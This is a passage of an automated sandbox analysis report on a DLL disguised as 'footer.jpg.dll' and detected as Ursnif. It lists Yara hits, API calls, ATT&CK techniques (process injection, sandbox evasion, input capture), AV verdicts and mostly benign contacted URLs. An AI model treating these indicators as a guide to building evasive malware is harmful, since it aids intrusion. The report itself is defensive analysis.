            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF0397 push dword ptr [esp+0Ch]; ret 1_2_00EF03AA
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF0397 push dword ptr [esp+10h]; ret 1_2_00EF03EF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF0066 push dword ptr [ebp-000000D8h]; ret 1_2_00EF009B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF0005 push dword ptr [ebp-000000D8h]; ret 1_2_00EF0065

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4164, type: MEMORY
            Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7048Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7048Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7048Thread sleep count: 256 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7048Thread sleep time: -128000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04877AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_04877AA8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF03F0 mov eax, dword ptr fs:[00000030h]1_2_00EF03F0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF009C mov eax, dword ptr fs:[00000030h]1_2_00EF009C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF0397 mov eax, dword ptr fs:[00000030h]1_2_00EF0397
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF0469 mov eax, dword ptr fs:[00000030h]1_2_00EF0469
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: regsvr32.exe, 00000001.00000002.1037220987.0000000003390000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: regsvr32.exe, 00000001.00000002.1037220987.0000000003390000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000001.00000002.1037220987.0000000003390000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000001.00000002.1037220987.0000000003390000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0487A446 cpuid 1_2_0487A446
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004012F4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,1_2_004012F4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0487A446 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_0487A446
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00401146 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_00401146

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4164, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4164, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2DLL Side-Loading1Process Injection12Masquerading1Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion1LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 350960 Sample: footer.jpg.dll Startdate: 10/02/2021 Architecture: WINDOWS Score: 76 32 Found malware configuration 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 Yara detected  Ursnif 2->36 38 Machine Learning detection for sample 2->38 8 loaddll32.exe 1 2->8         started        process3 process4 10 regsvr32.exe 8->10         started        13 cmd.exe 1 8->13         started        signatures5 40 Writes or reads registry keys via WMI 10->40 42 Writes registry values via WMI 10->42 15 iexplore.exe 1 82 13->15         started        process6 process7 17 iexplore.exe 158 15->17         started        20 iexplore.exe 25 15->20         started        22 iexplore.exe 29 15->22         started        dnsIp8 24 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49767, 49768 FASTLYUS United States 17->24 26 geolocation.onetrust.com 104.20.185.68, 443, 49763, 49764 CLOUDFLARENETUS United States 17->26 30 8 other IPs or domains 17->30 28 ocsp.sca1b.amazontrust.com 143.204.15.36, 49807, 49808, 80 AMAZON-02US United States 20->28

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            footer.jpg.dll12%ReversingLabsDOS.Trojan.Wacatac
            footer.jpg.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.regsvr32.exe.4870000.3.unpack100%AviraHEUR/AGEN.1108168Download File
            1.2.regsvr32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File

            Domains

            SourceDetectionScannerLabelLink
            tls13.taboola.map.fastly.net0%VirustotalBrowse
            ocsp.sca1b.amazontrust.com0%VirustotalBrowse
            img.img-taboola.com1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://onedrive.live.com;OneDrive-App0%Avira URL Cloudsafe
            https://onedrive.live.com;Fotos0%Avira URL Cloudsafe
            https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%Avira URL Cloudsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            http://www.wikipedia.com/0%URL Reputationsafe
            http://www.wikipedia.com/0%URL Reputationsafe
            http://www.wikipedia.com/0%URL Reputationsafe
            https://i.geistm.com/l/HFCH_DTS_LP?bcid=5e875ab70e43d27d2b9a8191&amp;bhid=60140e93c5b18a0414cccba8&a0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            contextual.media.net
            184.30.24.22
            truefalse
              high
              tls13.taboola.map.fastly.net
              151.101.1.44
              truefalseunknown
              ocsp.sca1b.amazontrust.com
              143.204.15.36
              truefalseunknown
              hblg.media.net
              184.30.24.22
              truefalse
                high
                lg3.media.net
                184.30.24.22
                truefalse
                  high
                  geolocation.onetrust.com
                  104.20.185.68
                  truefalse
                    high
                    web.vortex.data.msn.com
                    unknown
                    unknownfalse
                      high
                      www.msn.com
                      unknown
                      unknownfalse
                        high
                        srtb.msn.com
                        unknown
                        unknownfalse
                          high
                          img.img-taboola.com
                          unknown
                          unknownfalseunknown
                          cvision.media.net
                          unknown
                          unknownfalse
                            high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-mede-ch[1].htm.4.drfalse
                              high
                              https://www.skype.com/de/download-skype85-0f8009-68ddb2ab[1].js.4.drfalse
                                high
                                https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downliab2Data[1].json.4.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://searchads.msn.net/.cfm?&&kp=1&{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                                  high
                                  https://www.msn.com/de-ch/news/other/mordprozess-in-meilen-die-verteidigerin-will-einen-vollumf%c3%ade-ch[1].htm.4.drfalse
                                    high
                                    https://contextual.media.net/medianet.php?cid=8CU157172de-ch[1].htm.4.drfalse
                                      high
                                      https://www.msn.com/de-ch/nachrichten/coronareisende-ch[1].htm.4.drfalse
                                        high
                                        https://www.msn.com/de-ch/?ocid=iehpz{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                                          high
                                          https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_headerde-ch[1].htm.4.drfalse
                                            high
                                            http://www.hotmail.msn.com/pii/ReadOutlookEmail/85-0f8009-68ddb2ab[1].js.4.drfalse
                                              high
                                              https://onedrive.live.com;OneDrive-App85-0f8009-68ddb2ab[1].js.4.drfalse
                                              • Avira URL Cloud: safe
                                              low
                                              https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;de-ch[1].htm.4.drfalse
                                                high
                                                https://onedrive.live.com;Fotos85-0f8009-68ddb2ab[1].js.4.drfalse
                                                • Avira URL Cloud: safe
                                                low
                                                https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drfalse
                                                  high
                                                  https://www.msn.com/de-ch/news/other/corona-hinterl%c3%a4sst-tiefe-spuren-unispital-z%c3%bcrich-schrde-ch[1].htm.4.drfalse
                                                    high
                                                    http://www.amazon.com/msapplication.xml.3.drfalse
                                                      high
                                                      http://www.symantec.comfooter.jpg.dllfalse
                                                        high
                                                        https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=185-0f8009-68ddb2ab[1].js.4.drfalse
                                                          high
                                                          https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msnde-ch[1].htm.4.drfalse
                                                            high
                                                            https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel85-0f8009-68ddb2ab[1].js.4.drfalse
                                                              high
                                                              http://ogp.me/ns/fb#de-ch[1].htm.4.drfalse
                                                                high
                                                                http://www.twitter.com/msapplication.xml5.3.drfalse
                                                                  high
                                                                  https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                    high
                                                                    https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-ss&amp;ued=httde-ch[1].htm.4.drfalse
                                                                      high
                                                                      https://cdn.cookielaw.org/vendorlist/googleData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drfalse
                                                                        high
                                                                        https://outlook.com/de-ch[1].htm.4.drfalse
                                                                          high
                                                                          https://outlook.live.com/mail/deeplink/compose;Kalender85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                            high
                                                                            https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                                                                              high
                                                                              https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862de-ch[1].htm.4.drfalse
                                                                                high
                                                                                https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002de-ch[1].htm.4.drfalse
                                                                                  high
                                                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                                                                                    high
                                                                                    https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.jsoniab2Data[1].json.4.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                      high
                                                                                      https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drfalse
                                                                                        high
                                                                                        https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;de-ch[1].htm.4.drfalse
                                                                                          high
                                                                                          https://www.msn.com/de-ch/news/other/er-hat-uns-zuerst-provoziert-erst-dann-schlug-ich-ihn/ar-BB1dxyde-ch[1].htm.4.drfalse
                                                                                            high
                                                                                            https://www.msn.com/de-ch/news/other/bub-12-prallt-mit-velo-in-auto-und-wird-schwer-verletzt/ar-BB1dde-ch[1].htm.4.drfalse
                                                                                              high
                                                                                              https://cdn.cookielaw.org/vendorlist/iab2Data.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drfalse
                                                                                                high
                                                                                                https://onedrive.live.com/?qt=mru;Aktuelle85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                  high
                                                                                                  https://www.msn.com/de-ch/?ocid=iehp{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                                                                                                    high
                                                                                                    https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-navde-ch[1].htm.4.drfalse
                                                                                                      high
                                                                                                      http://www.reddit.com/msapplication.xml4.3.drfalse
                                                                                                        high
                                                                                                        https://www.msn.com/de-ch/news/other/t%c3%a4ter-ist-gest%c3%a4ndig-und-sagt-er-sei-provoziert-wordende-ch[1].htm.4.drfalse
                                                                                                          high
                                                                                                          https://www.skype.com/de-ch[1].htm.4.drfalse
                                                                                                            high
                                                                                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%auction[1].htm.4.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;de-ch[1].htm.4.drfalse
                                                                                                              high
                                                                                                              https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlinkde-ch[1].htm.4.drfalse
                                                                                                                high
                                                                                                                https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;de-ch[1].htm.4.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://www.msn.com/de-ch/nachrichten/regionalde-ch[1].htm.4.drfalse
                                                                                                                  high
                                                                                                                  http://www.nytimes.com/msapplication.xml3.3.drfalse
                                                                                                                    high
                                                                                                                    https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;ade-ch[1].htm.4.drfalse
                                                                                                                      high
                                                                                                                      https://onedrive.live.com/?qt=allmyphotos;Aktuelle85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                        high
                                                                                                                        https://www.bidstack.com/privacy-policy/iab2Data[1].json.4.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://onedrive.live.com/about/en/download/85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                          high
                                                                                                                          http://popup.taboola.com/germanauction[1].htm.4.drfalse
                                                                                                                            high
                                                                                                                            https://amzn.to/2TTxhNgde-ch[1].htm.4.drfalse
                                                                                                                              high
                                                                                                                              https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                high
                                                                                                                                https://client-s.gateway.messenger.live.com85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_dde-ch[1].htm.4.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.msn.com/de-ch/de-ch[1].htm.4.drfalse
                                                                                                                                      high
                                                                                                                                      https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                        high
                                                                                                                                        https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-riverde-ch[1].htm.4.drfalse
                                                                                                                                            high
                                                                                                                                            https://twitter.com/de-ch[1].htm.4.drfalse
                                                                                                                                              high
                                                                                                                                              https://www.msn.com/de-chde-ch[1].htm.4.drfalse
                                                                                                                                                high
                                                                                                                                                https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;mde-ch[1].htm.4.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=ch-dede-ch[1].htm.4.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://twitter.com/i/notifications;Ich85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopade-ch[1].htm.4.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;httpde-ch[1].htm.4.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://outlook.live.com/calendar85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auauction[1].htm.4.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://onedrive.live.com/#qt=mru85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;apauction[1].htm.4.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.msn.com/de-ch/news/other/weshalb-corona-das-bev%c3%b6lkerungswachstum-im-kanton-z%c3%bcrde-ch[1].htm.4.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.msn.com?form=MY01O4&OCID=MY01O4de-ch[1].htm.4.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://support.skype.com85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsbde-ch[1].htm.4.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=de-ch[1].htm.4.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://www.youtube.com/msapplication.xml7.3.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://ogp.me/ns#de-ch[1].htm.4.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656de-ch[1].htm.4.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://www.wikipedia.com/msapplication.xml6.3.drfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;httpde-ch[1].htm.4.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://i.geistm.com/l/HFCH_DTS_LP?bcid=5e875ab70e43d27d2b9a8191&amp;bhid=60140e93c5b18a0414cccba8&ade-ch[1].htm.4.drfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utmde-ch[1].htm.4.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://www.live.com/msapplication.xml2.3.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.msn.com/de-ch/news/other/fcz-chaot-nach-brutaler-schl%c3%a4gerei-vor-gericht-nicht-das-ede-ch[1].htm.4.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://onedrive.live.com/?qt=mru;OneDrive-App85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.skype.com/de85-0f8009-68ddb2ab[1].js.4.drfalse
